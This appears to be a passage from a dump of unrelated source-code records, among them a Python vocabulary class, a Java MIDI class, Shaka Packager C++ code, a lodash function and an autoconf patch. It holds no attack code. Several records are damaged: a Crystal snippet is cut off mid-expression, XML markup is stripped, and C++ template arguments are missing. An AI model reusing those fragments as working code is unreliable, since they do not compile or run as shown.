vocab.transform(['C', 'A', 'C']) == [c_index, a_index, c_index]\n True\n >>> vocab.transform(['C', 'A', '[OOV]']) == [c_index, a_index, 1]\n True\n >>> indices = vocab.transform(list('ABCDDZZZ'))\n >>> ' '.join(vocab.state['index_term'][i] for i in indices)\n 'A B C D D [OOV] [OOV] [OOV]'\n\n \"\"\"\n\n def __init__(self, pad_value: str = '', oov_value: str = ''):\n \"\"\"Vocabulary unit initializer.\"\"\"\n super().__init__()\n self._pad = pad_value\n self._oov = oov_value\n self._context['term_index'] = self.TermIndex()\n self._context['index_term'] = dict()\n\n class TermIndex(dict):\n \"\"\"Map term to index.\"\"\"\n\n def __missing__(self, key):\n \"\"\"Map out-of-vocabulary terms to index 1.\"\"\"\n return 1\n\n def fit(self, tokens: list):\n \"\"\"Build a :class:`TermIndex` and a :class:`IndexTerm`.\"\"\"\n self._context['term_index'][self._pad] = 0\n self._context['term_index'][self._oov] = 1\n self._context['index_term'][0] = self._pad\n self._context['index_term'][1] = self._oov\n terms = set(tokens)\n for index, term in enumerate(terms):\n self._context['term_index'][term] = index + 2\n self._context['index_term'][index + 2] = term\n\n def transform(self, input_: list) -> list:\n \"\"\"Transform a list of tokens to corresponding indices.\"\"\"\n return [self._context['term_index'][token] for token in input_]\n\n\nclass BertVocabulary(StatefulUnit):\n \"\"\"\n Vocabulary class.\n\n :param pad_value: The string value for the padding position.\n :param oov_value: The string value for the out-of-vocabulary terms.\n\n Examples:\n >>> vocab = BertVocabulary(pad_value='[PAD]', oov_value='[UNK]')\n >>> indices = vocab.transform(list('ABCDDZZZ'))\n\n \"\"\"\n\n def __init__(self, pad_value: str = '[PAD]', oov_value: str = '[UNK]'):\n \"\"\"Vocabulary unit initializer.\"\"\"\n super().__init__()\n 
self._pad = pad_value\n self._oov = oov_value\n self._context['term_index'] = self.TermIndex()\n self._context['index_term'] = {}\n\n class TermIndex(dict):\n \"\"\"Map term to index.\"\"\"\n\n def __missing__(self, key):\n \"\"\"Map out-of-vocabulary terms to index 100 .\"\"\"\n return 100\n\n def fit(self, vocab_path: str):\n \"\"\"Build a :class:`TermIndex` and a :class:`IndexTerm`.\"\"\"\n with open(vocab_path, 'r', encoding='utf-8') as vocab_file:\n for idx, line in enumerate(vocab_file):\n term = line.strip()\n self._context['term_index'][term] = idx\n self._context['index_term'][idx] = term\n\n def transform(self, input_: list) -> list:\n \"\"\"Transform a list of tokens to corresponding indices.\"\"\"\n return [self._context['term_index'][token] for token in input_]\n"} {"text": "/*\n * Copyright (c) 2007, 2013, Oracle and/or its affiliates. All rights reserved.\n * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.\n *\n * This code is free software; you can redistribute it and/or modify it\n * under the terms of the GNU General Public License version 2 only, as\n * published by the Free Software Foundation. Oracle designates this\n * particular file as subject to the \"Classpath\" exception as provided\n * by Oracle in the LICENSE file that accompanied this code.\n *\n * This code is distributed in the hope that it will be useful, but WITHOUT\n * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or\n * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License\n * version 2 for more details (a copy is included in the LICENSE file that\n * accompanied this code).\n *\n * You should have received a copy of the GNU General Public License version\n * 2 along with this work; if not, write to the Free Software Foundation,\n * Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n *\n * Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA\n * or visit www.oracle.com if you need additional information or have any\n * questions.\n */\n\npackage com.sun.media.sound;\n\nimport javax.sound.midi.InvalidMidiDataException;\nimport javax.sound.midi.ShortMessage;\n\n/**\n * A short message class that support for than 16 midi channels.\n *\n * @author Karl Helgason\n */\npublic final class SoftShortMessage extends ShortMessage {\n\n int channel = 0;\n\n @Override\n public int getChannel() {\n return channel;\n }\n\n @Override\n public void setMessage(int command, int channel, int data1, int data2)\n throws InvalidMidiDataException {\n this.channel = channel;\n super.setMessage(command, channel & 0xF, data1, data2);\n }\n\n @Override\n public Object clone() {\n SoftShortMessage clone = new SoftShortMessage();\n try {\n clone.setMessage(getCommand(), getChannel(), getData1(), getData2());\n } catch (InvalidMidiDataException e) {\n throw new IllegalArgumentException(e);\n }\n return clone;\n }\n}\n"} {"text": "\n *\n * Original code based on the CommonMark JS reference parser (https://bitly.com/commonmark-js)\n * - (c) John MacFarlane\n *\n * For the full copyright and license information, please view the LICENSE\n * file that was distributed with this source code.\n */\n\nnamespace League\\CommonMark\\Block\\Element;\n\nuse League\\CommonMark\\ContextInterface;\nuse League\\CommonMark\\Cursor;\n\n/**\n * @method children() AbstractBlock[]\n */\nclass ListBlock extends AbstractBlock\n{\n const TYPE_BULLET = 'bullet';\n const TYPE_ORDERED = 'ordered';\n\n /**\n * @deprecated This constant is deprecated in league/commonmark 1.4 and will 
be removed in 2.0; use TYPE_BULLET instead\n */\n const TYPE_UNORDERED = self::TYPE_BULLET;\n\n /**\n * @var bool\n */\n protected $tight = false;\n\n /**\n * @var ListData\n */\n protected $listData;\n\n public function __construct(ListData $listData)\n {\n $this->listData = $listData;\n }\n\n /**\n * @return ListData\n */\n public function getListData(): ListData\n {\n return $this->listData;\n }\n\n public function endsWithBlankLine(): bool\n {\n if ($this->lastLineBlank) {\n return true;\n }\n\n if ($this->hasChildren()) {\n return $this->lastChild() instanceof AbstractBlock && $this->lastChild()->endsWithBlankLine();\n }\n\n return false;\n }\n\n public function canContain(AbstractBlock $block): bool\n {\n return $block instanceof ListItem;\n }\n\n public function isCode(): bool\n {\n return false;\n }\n\n public function matchesNextLine(Cursor $cursor): bool\n {\n return true;\n }\n\n public function finalize(ContextInterface $context, int $endLineNumber)\n {\n parent::finalize($context, $endLineNumber);\n\n $this->tight = true; // tight by default\n\n foreach ($this->children() as $item) {\n if (!($item instanceof AbstractBlock)) {\n continue;\n }\n\n // check for non-final list item ending with blank line:\n if ($item->endsWithBlankLine() && $item !== $this->lastChild()) {\n $this->tight = false;\n break;\n }\n\n // Recurse into children of list item, to see if there are\n // spaces between any of them:\n foreach ($item->children() as $subItem) {\n if ($subItem instanceof AbstractBlock && $subItem->endsWithBlankLine() && ($item !== $this->lastChild() || $subItem !== $item->lastChild())) {\n $this->tight = false;\n break;\n }\n }\n }\n }\n\n public function isTight(): bool\n {\n return $this->tight;\n }\n\n public function setTight(bool $tight): self\n {\n $this->tight = $tight;\n\n return $this;\n }\n}\n"} {"text": "apiVersion: v1\nkind: ConfigMap\nmetadata:\n name: special-config\n namespace: default\ndata:\n special.how: very\n---\napiVersion: v1\nkind: ConfigMap\nmetadata:\n name: env-config\n namespace: default\ndata:\n log_level: INFO\n"} {"text": "#!/usr/bin/env crystal\nM=10**9+7\na=ARGF.gets_to_end.split.map &.to_i\nn,k=a.shift(2)\nr=[1]+[0]*k\na.each{|e|\n\tx=[0]\n\tq=0\n\t(1..k+1).each{|i|q=(q+r[i-1])%M;x<;\n});"} {"text": "$:.unshift File.dirname(__FILE__)\n\nrequire 'faker/address'\nrequire 'faker/company'\nrequire 'faker/internet'\nrequire 'faker/lorem'\nrequire 'faker/name'\nrequire 'faker/phone_number'\nrequire 'faker/version'\n\nrequire 'extensions/array'\nrequire 'extensions/object'\n\nmodule Faker\n def self.numerify(number_string)\n number_string.gsub(/#/) { rand(10).to_s }\n end\n \n def self.letterify(letter_string)\n letter_string.gsub(/\\?/) { ('a'..'z').to_a.rand }\n end\n \n def self.bothify(string)\n self.letterify(self.numerify(string))\n end\nend"} {"text": "package client // import \"github.com/docker/docker/client\"\n\nimport (\n\t\"context\"\n\t\"encoding/json\"\n\t\"fmt\"\n\n\t\"github.com/docker/docker/api/types\"\n)\n\n// DiskUsage requests the current data usage from the daemon\nfunc (cli *Client) DiskUsage(ctx context.Context) (types.DiskUsage, error) {\n\tvar du types.DiskUsage\n\n\tserverResp, err := cli.get(ctx, \"/system/df\", nil, nil)\n\tdefer ensureReaderClosed(serverResp)\n\tif err != nil {\n\t\treturn du, err\n\t}\n\n\tif err := json.NewDecoder(serverResp.body).Decode(&du); err != nil {\n\t\treturn du, fmt.Errorf(\"Error retrieving disk usage: %v\", err)\n\t}\n\n\treturn du, nil\n}\n"} {"text": "// Copyright 2017 Google Inc. 
All rights reserved.\n//\n// Use of this source code is governed by a BSD-style\n// license that can be found in the LICENSE file or at\n// https://developers.google.com/open-source/licenses/bsd\n\n#include \"packager/mpd/base/period.h\"\n\n#include \"packager/base/stl_util.h\"\n#include \"packager/mpd/base/adaptation_set.h\"\n#include \"packager/mpd/base/mpd_options.h\"\n#include \"packager/mpd/base/mpd_utils.h\"\n#include \"packager/mpd/base/xml/xml_node.h\"\n\nnamespace shaka {\nnamespace {\n\n// The easiest way to check whether two protobufs are equal, is to compare the\n// serialized version.\nbool ProtectedContentEq(\n const MediaInfo::ProtectedContent& content_protection1,\n const MediaInfo::ProtectedContent& content_protection2) {\n return content_protection1.SerializeAsString() ==\n content_protection2.SerializeAsString();\n}\n\nstd::set GetUUIDs(\n const MediaInfo::ProtectedContent& protected_content) {\n std::set uuids;\n for (const auto& entry : protected_content.content_protection_entry())\n uuids.insert(entry.uuid());\n return uuids;\n}\n\nconst std::string& GetDefaultAudioLanguage(const MpdOptions& mpd_options) {\n return mpd_options.mpd_params.default_language;\n}\n\nconst std::string& GetDefaultTextLanguage(const MpdOptions& mpd_options) {\n return mpd_options.mpd_params.default_text_language.empty()\n ? mpd_options.mpd_params.default_language\n : mpd_options.mpd_params.default_text_language;\n}\n\nAdaptationSet::Role RoleFromString(const std::string& role_str) {\n if (role_str == \"caption\")\n return AdaptationSet::Role::kRoleCaption;\n if (role_str == \"subtitle\")\n return AdaptationSet::Role::kRoleSubtitle;\n if (role_str == \"main\")\n return AdaptationSet::Role::kRoleMain;\n if (role_str == \"alternate\")\n return AdaptationSet::Role::kRoleAlternate;\n if (role_str == \"supplementary\")\n return AdaptationSet::Role::kRoleSupplementary;\n if (role_str == \"commentary\")\n return AdaptationSet::Role::kRoleCommentary;\n if (role_str == \"dub\")\n return AdaptationSet::Role::kRoleDub;\n return AdaptationSet::Role::kRoleUnknown;\n}\n\n} // namespace\n\nPeriod::Period(uint32_t period_id,\n double start_time_in_seconds,\n const MpdOptions& mpd_options,\n uint32_t* representation_counter)\n : id_(period_id),\n start_time_in_seconds_(start_time_in_seconds),\n mpd_options_(mpd_options),\n representation_counter_(representation_counter) {}\n\nAdaptationSet* Period::GetOrCreateAdaptationSet(\n const MediaInfo& media_info,\n bool content_protection_in_adaptation_set) {\n // Set duration if it is not set. 
It may be updated later from duration\n // calculated from segments.\n if (duration_seconds_ == 0)\n duration_seconds_ = media_info.media_duration_seconds();\n\n const std::string key = GetAdaptationSetKey(\n media_info, mpd_options_.mpd_params.allow_codec_switching);\n\n std::list& adaptation_sets = adaptation_set_list_map_[key];\n\n for (AdaptationSet* adaptation_set : adaptation_sets) {\n if (protected_adaptation_set_map_.Match(\n *adaptation_set, media_info, content_protection_in_adaptation_set))\n return adaptation_set;\n }\n\n // None of the adaptation sets match with the new content protection.\n // Need a new one.\n const std::string language = GetLanguage(media_info);\n std::unique_ptr new_adaptation_set =\n NewAdaptationSet(language, mpd_options_, representation_counter_);\n if (!SetNewAdaptationSetAttributes(language, media_info, adaptation_sets,\n content_protection_in_adaptation_set,\n new_adaptation_set.get())) {\n return nullptr;\n }\n\n if (content_protection_in_adaptation_set &&\n media_info.has_protected_content()) {\n protected_adaptation_set_map_.Register(*new_adaptation_set, media_info);\n AddContentProtectionElements(media_info, new_adaptation_set.get());\n }\n for (AdaptationSet* adaptation_set : adaptation_sets) {\n if (protected_adaptation_set_map_.Switchable(*adaptation_set,\n *new_adaptation_set)) {\n adaptation_set->AddAdaptationSetSwitching(new_adaptation_set.get());\n new_adaptation_set->AddAdaptationSetSwitching(adaptation_set);\n }\n }\n\n AdaptationSet* adaptation_set_ptr = new_adaptation_set.get();\n adaptation_sets.push_back(adaptation_set_ptr);\n adaptation_sets_.emplace_back(std::move(new_adaptation_set));\n return adaptation_set_ptr;\n}\n\nxml::scoped_xml_ptr Period::GetXml(bool output_period_duration) {\n adaptation_sets_.sort(\n [](const std::unique_ptr& adaptation_set_a,\n const std::unique_ptr& adaptation_set_b) {\n if (!adaptation_set_a->has_id())\n return false;\n if (!adaptation_set_b->has_id())\n return true;\n return adaptation_set_a->id() < adaptation_set_b->id();\n });\n\n xml::XmlNode period(\"Period\");\n\n // Required for 'dynamic' MPDs.\n period.SetId(id_);\n // Iterate thru AdaptationSets and add them to one big Period element.\n for (const auto& adaptation_set : adaptation_sets_) {\n xml::scoped_xml_ptr child(adaptation_set->GetXml());\n if (!child || !period.AddChild(std::move(child)))\n return nullptr;\n }\n\n if (output_period_duration) {\n period.SetStringAttribute(\"duration\",\n SecondsToXmlDuration(duration_seconds_));\n } else if (mpd_options_.mpd_type == MpdType::kDynamic) {\n period.SetStringAttribute(\"start\",\n SecondsToXmlDuration(start_time_in_seconds_));\n }\n return period.PassScopedPtr();\n}\n\nconst std::list Period::GetAdaptationSets() const {\n std::list adaptation_sets;\n for (const auto& adaptation_set : adaptation_sets_) {\n adaptation_sets.push_back(adaptation_set.get());\n }\n return adaptation_sets;\n}\n\nstd::unique_ptr Period::NewAdaptationSet(\n const std::string& language,\n const MpdOptions& options,\n uint32_t* representation_counter) {\n return std::unique_ptr(\n new AdaptationSet(language, options, representation_counter));\n}\n\nbool Period::SetNewAdaptationSetAttributes(\n const std::string& language,\n const MediaInfo& media_info,\n const std::list& adaptation_sets,\n bool content_protection_in_adaptation_set,\n AdaptationSet* new_adaptation_set) {\n if (!media_info.dash_roles().empty()) {\n for (const std::string& role_str : media_info.dash_roles()) {\n AdaptationSet::Role role = 
RoleFromString(role_str);\n if (role == AdaptationSet::kRoleUnknown) {\n LOG(ERROR) << \"Unrecognized role '\" << role_str << \"'.\";\n return false;\n }\n new_adaptation_set->AddRole(role);\n }\n } else if (!language.empty()) {\n const bool is_main_role =\n language == (media_info.has_audio_info()\n ? GetDefaultAudioLanguage(mpd_options_)\n : GetDefaultTextLanguage(mpd_options_));\n if (is_main_role)\n new_adaptation_set->AddRole(AdaptationSet::kRoleMain);\n }\n for (const std::string& accessibility : media_info.dash_accessibilities()) {\n size_t pos = accessibility.find('=');\n if (pos == std::string::npos) {\n LOG(ERROR)\n << \"Accessibility should be in scheme=value format, but seeing \"\n << accessibility;\n return false;\n }\n new_adaptation_set->AddAccessibility(accessibility.substr(0, pos),\n accessibility.substr(pos + 1));\n }\n\n new_adaptation_set->set_codec(GetBaseCodec(media_info));\n\n if (media_info.has_video_info()) {\n // Because 'language' is ignored for videos, |adaptation_sets| must have\n // all the video AdaptationSets.\n if (adaptation_sets.size() > 1) {\n new_adaptation_set->AddRole(AdaptationSet::kRoleMain);\n } else if (adaptation_sets.size() == 1) {\n (*adaptation_sets.begin())->AddRole(AdaptationSet::kRoleMain);\n new_adaptation_set->AddRole(AdaptationSet::kRoleMain);\n }\n\n if (media_info.video_info().has_playback_rate()) {\n std::string trick_play_reference_adaptation_set_key;\n AdaptationSet* trick_play_reference_adaptation_set =\n FindMatchingAdaptationSetForTrickPlay(\n media_info, content_protection_in_adaptation_set,\n &trick_play_reference_adaptation_set_key);\n if (trick_play_reference_adaptation_set) {\n new_adaptation_set->AddTrickPlayReference(\n trick_play_reference_adaptation_set);\n } else {\n trickplay_cache_[trick_play_reference_adaptation_set_key].push_back(\n new_adaptation_set);\n }\n } else {\n std::string trick_play_adaptation_set_key;\n AdaptationSet* trickplay_adaptation_set =\n FindMatchingAdaptationSetForTrickPlay(\n media_info, content_protection_in_adaptation_set,\n &trick_play_adaptation_set_key);\n if (trickplay_adaptation_set) {\n trickplay_adaptation_set->AddTrickPlayReference(new_adaptation_set);\n trickplay_cache_.erase(trick_play_adaptation_set_key);\n }\n }\n\n } else if (media_info.has_text_info()) {\n // IOP requires all AdaptationSets to have (sub)segmentAlignment set to\n // true, so carelessly set it to true.\n // In practice it doesn't really make sense to adapt between text tracks.\n new_adaptation_set->ForceSetSegmentAlignment(true);\n }\n return true;\n}\n\nAdaptationSet* Period::FindMatchingAdaptationSetForTrickPlay(\n const MediaInfo& media_info,\n bool content_protection_in_adaptation_set,\n std::string* adaptation_set_key) {\n std::list* adaptation_sets = nullptr;\n const bool is_trickplay_adaptation_set =\n media_info.video_info().has_playback_rate();\n if (is_trickplay_adaptation_set) {\n *adaptation_set_key = GetAdaptationSetKeyForTrickPlay(media_info);\n if (adaptation_set_list_map_.find(*adaptation_set_key) ==\n adaptation_set_list_map_.end())\n return nullptr;\n adaptation_sets = &adaptation_set_list_map_[*adaptation_set_key];\n } else {\n *adaptation_set_key = GetAdaptationSetKey(\n media_info, mpd_options_.mpd_params.allow_codec_switching);\n if (trickplay_cache_.find(*adaptation_set_key) == trickplay_cache_.end())\n return nullptr;\n adaptation_sets = &trickplay_cache_[*adaptation_set_key];\n }\n for (AdaptationSet* adaptation_set : *adaptation_sets) {\n if (protected_adaptation_set_map_.Match(\n 
*adaptation_set, media_info,\n content_protection_in_adaptation_set)) {\n return adaptation_set;\n }\n }\n\n return nullptr;\n}\n\nstd::string Period::GetAdaptationSetKeyForTrickPlay(\n const MediaInfo& media_info) {\n MediaInfo media_info_no_trickplay = media_info;\n media_info_no_trickplay.mutable_video_info()->clear_playback_rate();\n return GetAdaptationSetKey(media_info_no_trickplay,\n mpd_options_.mpd_params.allow_codec_switching);\n}\n\nvoid Period::ProtectedAdaptationSetMap::Register(\n const AdaptationSet& adaptation_set,\n const MediaInfo& media_info) {\n DCHECK(!ContainsKey(protected_content_map_, &adaptation_set));\n protected_content_map_[&adaptation_set] = media_info.protected_content();\n}\n\nbool Period::ProtectedAdaptationSetMap::Match(\n const AdaptationSet& adaptation_set,\n const MediaInfo& media_info,\n bool content_protection_in_adaptation_set) {\n if (adaptation_set.codec() != GetBaseCodec(media_info))\n return false;\n\n if (!content_protection_in_adaptation_set)\n return true;\n\n const auto protected_content_it =\n protected_content_map_.find(&adaptation_set);\n // If the AdaptationSet ID is not registered in the map, then it is clear\n // content.\n if (protected_content_it == protected_content_map_.end())\n return !media_info.has_protected_content();\n if (!media_info.has_protected_content())\n return false;\n\n return ProtectedContentEq(protected_content_it->second,\n media_info.protected_content());\n}\n\nbool Period::ProtectedAdaptationSetMap::Switchable(\n const AdaptationSet& adaptation_set_a,\n const AdaptationSet& adaptation_set_b) {\n const auto protected_content_it_a =\n protected_content_map_.find(&adaptation_set_a);\n const auto protected_content_it_b =\n protected_content_map_.find(&adaptation_set_b);\n\n if (protected_content_it_a == protected_content_map_.end())\n return protected_content_it_b == protected_content_map_.end();\n if (protected_content_it_b == protected_content_map_.end())\n return false;\n // Get all the UUIDs of the AdaptationSet. If another AdaptationSet has the\n // same UUIDs then those are switchable.\n return GetUUIDs(protected_content_it_a->second) ==\n GetUUIDs(protected_content_it_b->second);\n}\n\nPeriod::~Period() {\n if (!trickplay_cache_.empty()) {\n LOG(WARNING) << \"Trickplay adaptation set did not get a valid adaptation \"\n \"set match. 
Please check the command line options.\";\n }\n}\n\n} // namespace shaka\n"} {"text": "Manifest-Version: 1.0\nBuilt-By: Administrator\nClass-Path: leo-im-api-1.0.jar leo-im-common-1.0.jar leo-im-service-1.\n 0.jar leo-im-store-1.0.jar mysql-connector-java-8.0.11.jar protobuf-j\n ava-2.6.0.jar druid-1.1.9.jar leo-im-model-1.0.jar leo-im-util-1.0.ja\n r cglib-3.2.6.jar asm-6.0.jar ant-1.9.6.jar ant-launcher-1.9.6.jar jj\n wt-0.9.0.jar jackson-databind-2.8.9.jar jackson-annotations-2.8.0.jar\n jackson-core-2.8.9.jar leo-im-notification-1.0.jar jedis-2.9.0.jar c\n ommons-pool2-2.4.2.jar fastjson-1.2.47.jar slf4j-api-1.7.25.jar logba\n ck-classic-1.2.3.jar logback-core-1.2.3.jar\nBuild-Jdk: 1.8.0_131\nCreated-By: Maven Integration for Eclipse\nMain-Class: org.leo.im.starter.App\n\n"} {"text": "var baseForOwnRight = require('../internal/baseForOwnRight'),\n createFindKey = require('../internal/createFindKey');\n\n/**\n * This method is like `_.findKey` except that it iterates over elements of\n * a collection in the opposite order.\n *\n * If a property name is provided for `predicate` the created `_.property`\n * style callback returns the property value of the given element.\n *\n * If a value is also provided for `thisArg` the created `_.matchesProperty`\n * style callback returns `true` for elements that have a matching property\n * value, else `false`.\n *\n * If an object is provided for `predicate` the created `_.matches` style\n * callback returns `true` for elements that have the properties of the given\n * object, else `false`.\n *\n * @static\n * @memberOf _\n * @category Object\n * @param {Object} object The object to search.\n * @param {Function|Object|string} [predicate=_.identity] The function invoked\n * per iteration.\n * @param {*} [thisArg] The `this` binding of `predicate`.\n * @returns {string|undefined} Returns the key of the matched element, else `undefined`.\n * @example\n *\n * var users = {\n * 'barney': { 'age': 36, 'active': true },\n * 'fred': { 'age': 40, 'active': false },\n * 'pebbles': { 'age': 1, 'active': true }\n * };\n *\n * _.findLastKey(users, function(chr) {\n * return chr.age < 40;\n * });\n * // => returns `pebbles` assuming `_.findKey` returns `barney`\n *\n * // using the `_.matches` callback shorthand\n * _.findLastKey(users, { 'age': 36, 'active': true });\n * // => 'barney'\n *\n * // using the `_.matchesProperty` callback shorthand\n * _.findLastKey(users, 'active', false);\n * // => 'fred'\n *\n * // using the `_.property` callback shorthand\n * _.findLastKey(users, 'active');\n * // => 'pebbles'\n */\nvar findLastKey = createFindKey(baseForOwnRight);\n\nmodule.exports = findLastKey;\n"} {"text": "# == Schema Information\n#\n# Table name: email_searches\n#\n# id :integer not null, primary key\n# domain :string(255)\n# crawls :integer\n# harvested_email_id :integer\n# created_at :datetime\n# updated_at :datetime\n#\n\nrequire 'test_helper'\n\nclass EmailSearchTest < ActiveSupport::TestCase\n # test \"the truth\" do\n # assert true\n # end\nend\n"} {"text": "From b0a64db90a24469e36978c748417ebe456b34d59 Mon Sep 17 00:00:00 2001\nFrom: Khem Raj \nDate: Sat, 22 Apr 2017 11:54:57 -0700\nSubject: [PATCH] configure: Check for -Wno-error=format-truncation compiler\n option\n\nIf this option is supported by compiler then disable it ( gcc7+)\nUse -Werror to elevate the warning to an error in case compiler like clang\nwhich warn about unknown options but not error out unless asked for\n\nFixes\nclient.c:834:23: error: '%s' directive output may be truncated 
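The Shaka Packager period.cc excerpt above treats two protected AdaptationSets as switchable only when the sets of content-protection UUIDs registered for them compare equal. A minimal standalone C++ sketch of that set-comparison idea follows; it is illustrative only (SwitchableByUuids and the sample system IDs are not part of the packager source, and the UUID literals are the commonly published Widevine and PlayReady system IDs).

#include <cassert>
#include <set>
#include <string>

// Illustrative helper, not from the packager: two streams are considered
// switchable only when they are protected by exactly the same DRM systems,
// i.e. their UUID sets compare equal element for element.
bool SwitchableByUuids(const std::set<std::string>& uuids_a,
                       const std::set<std::string>& uuids_b) {
  return uuids_a == uuids_b;
}

int main() {
  const std::set<std::string> widevine = {
      "edef8ba9-79d6-4ace-a3c8-27dcd51d21ed"};
  const std::set<std::string> widevine_playready = {
      "edef8ba9-79d6-4ace-a3c8-27dcd51d21ed",
      "9a04f079-9840-4286-ab92-e65be0885f95"};

  assert(SwitchableByUuids(widevine, widevine));             // same DRM systems
  assert(!SwitchableByUuids(widevine, widevine_playready));  // extra system -> not switchable
  return 0;
}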
writing up to 1023 bytes into a region of size 1010 [-Werror=format-truncation=]\n\nSigned-off-by: Khem Raj \n\n---\n configure.ac | 1 +\n m4/ax_check_compile_flag.m4 | 74 +++++++++++++++++++++++++++++++++++++\n 2 files changed, 75 insertions(+)\n create mode 100644 m4/ax_check_compile_flag.m4\n\ndiff --git a/configure.ac b/configure.ac\nindex a7eca97d..560eb988 100644\n--- a/configure.ac\n+++ b/configure.ac\n@@ -7101,6 +7101,7 @@ if test \"x$GCC\" = \"xyes\"; then\n AM_CXXFLAGS=\"$AM_CXXFLAGS -Werror\"\n fi\n fi\n+AX_CHECK_COMPILE_FLAG([-Werror -Werror=format-truncation],[AM_CFLAGS=\"$AM_CFLAGS -Wno-error=format-truncation\" AM_CXXFLAGS=\"$AM_CXXFLAGS -Wno-error=format-truncation\"])\n \n AC_SUBST([AM_CFLAGS])\n AC_SUBST([AM_CXXFLAGS])\ndiff --git a/m4/ax_check_compile_flag.m4 b/m4/ax_check_compile_flag.m4\nnew file mode 100644\nindex 00000000..dcabb92a\n--- /dev/null\n+++ b/m4/ax_check_compile_flag.m4\n@@ -0,0 +1,74 @@\n+# ===========================================================================\n+# https://www.gnu.org/software/autoconf-archive/ax_check_compile_flag.html\n+# ===========================================================================\n+#\n+# SYNOPSIS\n+#\n+# AX_CHECK_COMPILE_FLAG(FLAG, [ACTION-SUCCESS], [ACTION-FAILURE], [EXTRA-FLAGS], [INPUT])\n+#\n+# DESCRIPTION\n+#\n+# Check whether the given FLAG works with the current language's compiler\n+# or gives an error. (Warnings, however, are ignored)\n+#\n+# ACTION-SUCCESS/ACTION-FAILURE are shell commands to execute on\n+# success/failure.\n+#\n+# If EXTRA-FLAGS is defined, it is added to the current language's default\n+# flags (e.g. CFLAGS) when the check is done. The check is thus made with\n+# the flags: \"CFLAGS EXTRA-FLAGS FLAG\". This can for example be used to\n+# force the compiler to issue an error when a bad flag is given.\n+#\n+# INPUT gives an alternative input source to AC_COMPILE_IFELSE.\n+#\n+# NOTE: Implementation based on AX_CFLAGS_GCC_OPTION. Please keep this\n+# macro in sync with AX_CHECK_{PREPROC,LINK}_FLAG.\n+#\n+# LICENSE\n+#\n+# Copyright (c) 2008 Guido U. Draheim \n+# Copyright (c) 2011 Maarten Bosmans \n+#\n+# This program is free software: you can redistribute it and/or modify it\n+# under the terms of the GNU General Public License as published by the\n+# Free Software Foundation, either version 3 of the License, or (at your\n+# option) any later version.\n+#\n+# This program is distributed in the hope that it will be useful, but\n+# WITHOUT ANY WARRANTY; without even the implied warranty of\n+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General\n+# Public License for more details.\n+#\n+# You should have received a copy of the GNU General Public License along\n+# with this program. If not, see .\n+#\n+# As a special exception, the respective Autoconf Macro's copyright owner\n+# gives unlimited permission to copy, distribute and modify the configure\n+# scripts that are the output of Autoconf when processing the Macro. You\n+# need not follow the terms of the GNU General Public License when using\n+# or distributing such scripts, even though portions of the text of the\n+# Macro appear in them. The GNU General Public License (GPL) does govern\n+# all other use of the material that constitutes the Autoconf Macro.\n+#\n+# This special exception to the GPL applies to versions of the Autoconf\n+# Macro released by the Autoconf Archive. 
When you make and distribute a\n+# modified version of the Autoconf Macro, you may extend this special\n+# exception to the GPL to apply to your modified version as well.\n+\n+#serial 5\n+\n+AC_DEFUN([AX_CHECK_COMPILE_FLAG],\n+[AC_PREREQ(2.64)dnl for _AC_LANG_PREFIX and AS_VAR_IF\n+AS_VAR_PUSHDEF([CACHEVAR],[ax_cv_check_[]_AC_LANG_ABBREV[]flags_$4_$1])dnl\n+AC_CACHE_CHECK([whether _AC_LANG compiler accepts $1], CACHEVAR, [\n+ ax_check_save_flags=$[]_AC_LANG_PREFIX[]FLAGS\n+ _AC_LANG_PREFIX[]FLAGS=\"$[]_AC_LANG_PREFIX[]FLAGS $4 $1\"\n+ AC_COMPILE_IFELSE([m4_default([$5],[AC_LANG_PROGRAM()])],\n+ [AS_VAR_SET(CACHEVAR,[yes])],\n+ [AS_VAR_SET(CACHEVAR,[no])])\n+ _AC_LANG_PREFIX[]FLAGS=$ax_check_save_flags])\n+AS_VAR_IF(CACHEVAR,yes,\n+ [m4_default([$2], :)],\n+ [m4_default([$3], :)])\n+AS_VAR_POPDEF([CACHEVAR])dnl\n+])dnl AX_CHECK_COMPILE_FLAGS\n"} {"text": "//\n// CustomSegue.h\n// CustomSegue\n//\n// Created by phimage on 24/07/16.\n// Copyright © 2016 phimage. All rights reserved.\n//\n\n#import \n\n//! Project version number for CustomSegue.\nFOUNDATION_EXPORT double CustomSegueVersionNumber;\n\n//! Project version string for CustomSegue.\nFOUNDATION_EXPORT const unsigned char CustomSegueVersionString[];\n\n// In this header, you should import all the public headers of your framework using statements like #import \n\n\n"} {"text": "\n\t4.0.0\n\t\n\t\torg.imixs.workflow\n\t\timixs-workflow\n\t\t5.2.6-SNAPSHOT\n\t\n\timixs-workflow-index-lucene\n\tSearch Index Apache Lucene\n\n\t\n\t\n\t\t\n\t\t\n\t\t\torg.imixs.workflow\n\t\t\timixs-workflow-core\n\t\t\t${project.version}\n\t\t\n\t\t\n\t\t\torg.imixs.workflow\n\t\t\timixs-workflow-engine\n\t\t\t${project.version}\n\t\t\n\t\n\t\t\n\t\t\n\t\t\torg.apache.lucene\n\t\t\tlucene-core\n\t\t\t${lucene.version}\n\t\t\n\t\t\n\t\t\torg.apache.lucene\n\t\t\tlucene-analyzers-common\n\t\t\t${lucene.version}\n\t\t\n\t\t\n\t\t\torg.apache.lucene\n\t\t\tlucene-queryparser\n\t\t\t${lucene.version}\n\t\t\n\t\n\tSerach Index based on Apache Lucene Core\n"} {"text": "\n\n \n \n \n"} {"text": "/*\n * Copyright (c) 1998, 2001, Oracle and/or its affiliates. All rights reserved.\n * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.\n *\n * This code is free software; you can redistribute it and/or modify it\n * under the terms of the GNU General Public License version 2 only, as\n * published by the Free Software Foundation. Oracle designates this\n * particular file as subject to the \"Classpath\" exception as provided\n * by Oracle in the LICENSE file that accompanied this code.\n *\n * This code is distributed in the hope that it will be useful, but WITHOUT\n * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or\n * FITNESS FOR A PARTICULAR PURPOSE. 
